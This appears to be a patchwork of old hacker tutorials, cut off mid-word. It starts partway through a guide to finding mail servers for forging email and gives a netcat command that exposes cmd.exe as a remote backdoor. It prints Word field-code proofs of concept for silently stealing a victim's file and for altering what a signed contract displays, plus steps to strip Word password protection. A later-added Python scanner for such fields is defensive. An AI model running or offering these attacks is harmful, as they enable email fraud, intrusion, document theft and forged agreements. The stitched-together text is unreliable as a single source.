dimensional.com MX preference = 20, mail exchanger =mx3.dimensional.com
dimensional.com nameserver = ns.dimensional.com
dimensional.com nameserver = ns-1.dimensional.com
dimensional.com nameserver = ns-2.dimensional.com
dimensional.com nameserver = ns-3.dimensional.com
dimensional.com nameserver = ns-4.dimensional.com
mail.dimensional.com internet address = 206.124.0.11
mx2.dimensional.com internet address = 206.124.0.30
mx3.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.10
ns.dimensional.com internet address = 206.124.26.254
ns.dimensional.com internet address = 206.124.0.254
ns.dimensional.com internet address = 206.124.1.254
ns.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.32
ns.dimensional.com internet address = 206.124.0.30
ns.dimensional.com internet address = 206.124.0.25
ns.dimensional.com internet address = 206.124.0.15
ns.dimensional.com internet address = 206.124.0.21
ns.dimensional.com internet address = 206.124.0.9
ns-1.dimensional.com internet address = 206.124.26.254
ns-2.dimensional.com internet address = 209.98.32.54
ns-3.dimensional.com internet address = 206.124.1.254
ns-4.dimensional.com internet address = 206.124.0.254
>
The lines that tell you what computers will let you forge email to people with @dimensional.com addresses are:
dimensional.com MX preference = 5, mail exchanger =mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger =mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger =mx3.dimensional.com
MX stands for mail exchange. The lower the preference number, the more they would like you to use that address for email. If that lowest number server is too busy, then try another server.
Sometimes when you ask about a mail server, nslookup will give you this kind of error message:
DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to [207.217.120.202] timed-out
To get around this problem, you need to find out what are the domain servers for your target online provider. A good place to start looking is http://netsol.com/cgi-bin/whois/whois . If this doesn't work, see http://happyhacker.org/HHA/fightback.shtml for how to find the domain servers for any Internet address.
****************Newbie note: A domain name server provides information on the names and numbers assigned to computers on the Internet. For example, dns1.wurld.net and dns2.wurld.net contain information on happyhacker.org, techbroker.com, securitynewsportal.com, thirdpig.com and sage-inc.com. When you query dns1.wurld.net about other computers, it might have to go hunting for that information from other name servers. That's why you might get a timed out failure.***************
Once you know the domain servers for an online service, set one of them for the server for your nslookup program. Here's how you do it:
C:\ >nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11
Now give the command:
> server 207.217.126.41
Default Server: ns1.earthlink.net
Address: 207.217.126.41
Next command should be:
> set q=mx
> earthlink.net
Server: ns1.earthlink.net
Address: 207.217.126.41
earthlink.net MX preference = 5, mail exchanger = mx04.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx05.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx06.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx00.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx01.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx02.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx03.earthlink.net
earthlink.net nameserver = ns3.earthlink.net
earthlink.net nameserver = ns1.earthlink.net
earthlink.net nameserver = ns2.earthlink.net
mx00.earthlink.net internet address = 207.217.120.28
mx01.earthlink.net internet address = 207.217.120.29
mx02.earthlink.net internet address = 207.217.120.79
mx03.earthlink.net internet address = 207.217.120.78
mx04.earthlink.net internet address = 207.217.120.249
mx05.earthlink.net internet address = 207.217.120.31
mx06.earthlink.net internet address = 207.217.120.23
ns1.earthlink.net internet address = 207.217.126.41
ns2.earthlink.net internet address = 207.217.77.42
ns3.earthlink.net internet address = 207.217.120.43
>
Your own online service will usually not mind and may even be glad if you use telnet to read your email. Sometimes a malicious person or faulty email program will send you a message that is so screwed up that your email program can't download it. With telnet you can manually delete the bad email. Otherwise tech support has to do it for you.
If you think about it, this ability to forge email is a huge temptation to spammers. How can your online provider keep the bad guys from filling up a victim's email box with garbage? The first time a bad guy tries this, probably nothing will stop him or her. The second time the online provider might block the bad guy at the firewall, maybe call the bad guy's online provider and kick him or her and maybe get the bad guy busted or sued.
**************You can go to jail warning: Sending hundreds or thousands of junk emails to bomb someone's email account is a felony in the US.***************
***************You can get sued warning: Spamming, where you send only one email to each person, but send thousands or millions of emails, is borderline legal. However, spammers have been successfully sued when they forge the email addresses of innocent people as senders of their spam.****************
Now that you know how to read and write email with telnet, you definitely have something you can use to show off with. Happy hacking!
Oh, here's one last goodie for advanced users. Get netcat for Windows. It's a free program written by Weld Pond and Hobbit, and available from many sites, for example http://www.atstake.com/research/tools/#network_utilities . It is basically telnet on steroids. For example, using netcat, you can set up a port on your Windows computer to allow people to telnet into a DOS shell by using this command:
C:\>nc -L -p 5000 -t -e cmd.exe
You can specify a different port number than 5000. Just make sure it doesn't conflict with another port by checking with the netstat command. Then you and your friends, enemies and random losers can either telnet in or netcat in with the command:
C:\>nc -v [ipaddress of target] [port]
Of course you will probably get hacked for setting up this port. However, if you set up a sniffer to keep track of the action, you can turn this scary back door into a fascinating honeypot. For example, you could run it on port 23 and watch all the hackers who attack with telnet hoping to log in. With some programming you could even fake a unix-like login sequence and play some tricks on your attackers.

MICROSOFT OFFICE HACK

I have stumbled onto a couple of potential security issues in Microsoft Word blogs I would like to share. In both cases the adversary (mis)uses fields to perpetrate the attack. It's important to note that fields are not macros and, as far as I know, cannot be disabled by the user. I am providing a basic description along with a proof-of-concept demo. I am fairly certain that someone with free time and imagination can expand on these principles, possibly applying them to other products.
Following tradition I'll use Hacker and Victim as the two parties involved. Hacker will be the adversary.
1) Document collaboration spyware.

Attack Basics: Hacker sends Victim a Word document for revisions. After Victim edits, saves, and mails it back to Hacker, the file will also include the contents of another file(s) from Victim's computer that Hacker has specified a priori. To achieve this, Hacker embeds the INCLUDETEXT field into the document. The field results in the inclusion of a specified file into the current document. Of course, Hacker must be careful to include it in such a way that it does not become apparent to Victim. Hacker can do all the usual things like hidden text, small white font, etc. Alternatively (and in my opinion cleaner), she can embed the INCLUDETEXT field within a dummy IF field that always returns an empty string. In this case, the only way Victim can notice the included file is if he goes browsing through field codes.
Attack Improvements: The disadvantage of the basic attack is that Hacker must rely on Victim to update the INCLUDETEXT field to import the file. If the document is large and contains tables of contents, figures, etc. then Victim is very likely to update all the fields. However, Hacker would like to make sure that the field gets updated regardless of whether Victim does it manually or not. Automatic updates can be forced if a DATE field is embedded into the INCLUDETEXT and it is the last date field in the document (don't ask me why).
Proof of concept: Inserting the following field structure into the footer of the last page will steal the contents of c:\a.txt on the target's computer. Keep in mind the plain curly braces below must actually be replaced with Word field braces (you can either use the menus to insert fields one by one, or ask google how to do it by hand).
{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } * MERGEFORMAT } = "" "" * MERGEFORMAT }

Countermeasures: The only thing you can do now is decide how paranoid you want to be. If you must edit and send out a Word file with unknown origins, you may want to manually go through the fields. It would be nice to be able to force user confirmation (via a dialog box) for all includes. Alternatively one could write a scanner. Of course an optional standalone checker will never be used by those most at risk.
2) Oblivious signing

Attack Basics: Hacker and Victim want to sign a contract saying that Hacker will pay Victim $100. Hacker types it up as a Word document and both digitally sign it. In a few days Victim comes to Hacker to collect his money. To his surprise, Hacker presents him with a Word document that states he owes her $100. Hacker also has a valid signature from Victim for the new document. In fact, it is the exact same signature as for the contract Victim remembers signing and, to Victim's great amazement, the two Word documents are actually identical in hex. What Hacker did was insert an IF field that branched on an external input such as date or filename. Thus even though the signed contents remained the same, the displayed contents changed because they were partially dependent on unsigned inputs. The basic point is that very few users know the actual contents of their Word documents and it should be obvious that one should never sign what one cannot read. Of course, Victim could contest the contract in court. An expert witness (that's actually an expert) could easily demonstrate that there are unsigned inputs and therefore it is not clear which version was actually signed. Thus Victim can get out of the fraudulent contract. However, the same logic will hold for Hacker and she gets away without paying Victim the $100 she signed for. Thus, an adversary can build in a free escape clause. Note that I am just speculating about all the legal aspects.
Proof of concept: Inserting the following field structure at the tail of the document will cause "Hello" to be displayed if the filename is "a.doc" and "Bye" otherwise.
{ IF { FILENAME * MERGEFORMAT { DATE } } = "a.doc" "Hello" "Bye" * MERGEFORMAT }
Update: this flaw has been fixed in Office 2003 onwards but still works in Office 2000 and even sometimes in 2002/03
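The countermeasure suggested for the first issue ("one could write a scanner") also covers the unsigned-input IF of the second. The following is an added example, not code from the original post: it rebuilds nested field codes and flags INCLUDETEXT-style imports and IF fields that branch on DATE, TIME or FILENAME. It assumes the file has been saved in the later .docx (OOXML) container rather than the binary .doc of the Word versions discussed; the function names and the sample_docx helper are hypothetical.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET  # for hostile files, swap in a hardened XML parser

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
IMPORTERS = {"INCLUDETEXT", "INCLUDEPICTURE"}  # fields that pull another file in
UNSIGNED = {"DATE", "TIME", "FILENAME"}        # inputs outside the signed bytes

def fields_in_part(xml_bytes):
    """Rebuild (type, instruction, nested types) for each field in one XML part."""
    stack, done = [], []
    def close(instr, nested):
        name = (instr.split() or ["?"])[0].upper()
        done.append((name, " ".join(instr.split()), nested))
        if stack and not stack[-1]["result"]:  # field sits inside a parent's code
            stack[-1]["nested"] |= {name} | nested
    for el in ET.fromstring(xml_bytes).iter():
        kind = el.get(W + "fldCharType")       # only present on w:fldChar
        if kind == "begin":
            stack.append({"instr": "", "nested": set(), "result": False})
        elif kind == "separate" and stack:
            stack[-1]["result"] = True         # what follows is the cached result
        elif kind == "end" and stack:
            field = stack.pop()
            close(field["instr"], field["nested"])
        elif el.tag == W + "instrText" and stack and not stack[-1]["result"]:
            stack[-1]["instr"] += el.text or ""
        elif el.tag == W + "fldSimple":        # one-element form of a field
            close(el.get(W + "instr", ""), set())
    return done

def scan_docx(source):
    """Return (part, field, reason, instruction) findings; source is a path or file object."""
    out = []
    with zipfile.ZipFile(source) as z:
        for part in (n for n in z.namelist() if n.startswith("word/") and n.endswith(".xml")):
            for name, instr, nested in fields_in_part(z.read(part)):
                if name in IMPORTERS:
                    out.append((part, name, "imports external content", instr))
                elif name == "IF" and nested & UNSIGNED:
                    out.append((part, name, "display depends on unsigned input", instr))
    return out

def sample_docx(code):
    """Constructed sample: a .docx whose footer holds `code`, given in the post's { } notation."""
    tag = {"{": '<w:fldChar w:fldCharType="begin"/>', "}": '<w:fldChar w:fldCharType="end"/>'}
    runs = "".join("<w:r>%s</w:r>" % tag.get(t, "<w:instrText>%s</w:instrText>" % t)
                   for t in re.split("([{}])", code) if t)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:       # W[1:-1] is the namespace URI without braces
        z.writestr("word/footer1.xml", '<w:ftr xmlns:w="%s"><w:p>%s</w:p></w:ftr>' % (W[1:-1], runs))
    return buf
```

Calling scan_docx(sample_docx(...)) with either field structure from the post, typed with plain braces as printed there, returns the flagged fields together with the part they were found in; a document containing only a PAGE field returns an empty list.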
__________________________________________________________________________
We can consistently crash Word 2000 using the following method:
1) Open up any text/document editor such as notepad or wordpad
2) type a single word (must be a known word, no punctuation).
3) highlight the whole word and CTRL+C
4) launch word 2000
5) CTRL+V
6) press HOME to take you to the start of the line
7) type I
8) hit the space bar
This consistently crashes Word 2000 with the following error message:
DDE Server Window: WINWORD.EXE - Application Error
The instruction at "0x3076a63e" referenced memory at "0x00000000". The memory could not be "read".


Vulnerability: remove office passwords
Vulnerable: MS Word (Win2K/XP)

Example 1
1) Open MS Word with a new/blank page
2) Now select "Insert" >> "File" >> browse for your password protected doc & select "Insert" & "Insert" password protected doc into your new/blank doc
3) Now select "Tools" & Whey hey, voila, there's no longer an "Unprotect document" ... password vanished ...

Example 2
1) open your password protected doc in MS Word i.e. you can't edit protected fields (apparently)
2) Save as a Rich Text Format (RTF) & keep this RTF file open in MS Word (YES, keep open)
3) Whilst your new RTF file is open in MS Word, go "File open" & find your newly saved RTF file & open (YES, you DO need to do 'tis even though you already have it open)
4) If prompted to revert say YES, if not prompted stay calm. Now in your MS Word menu go & "Unprotect document", amazingly, voila, you don't get prompted for a passwor

 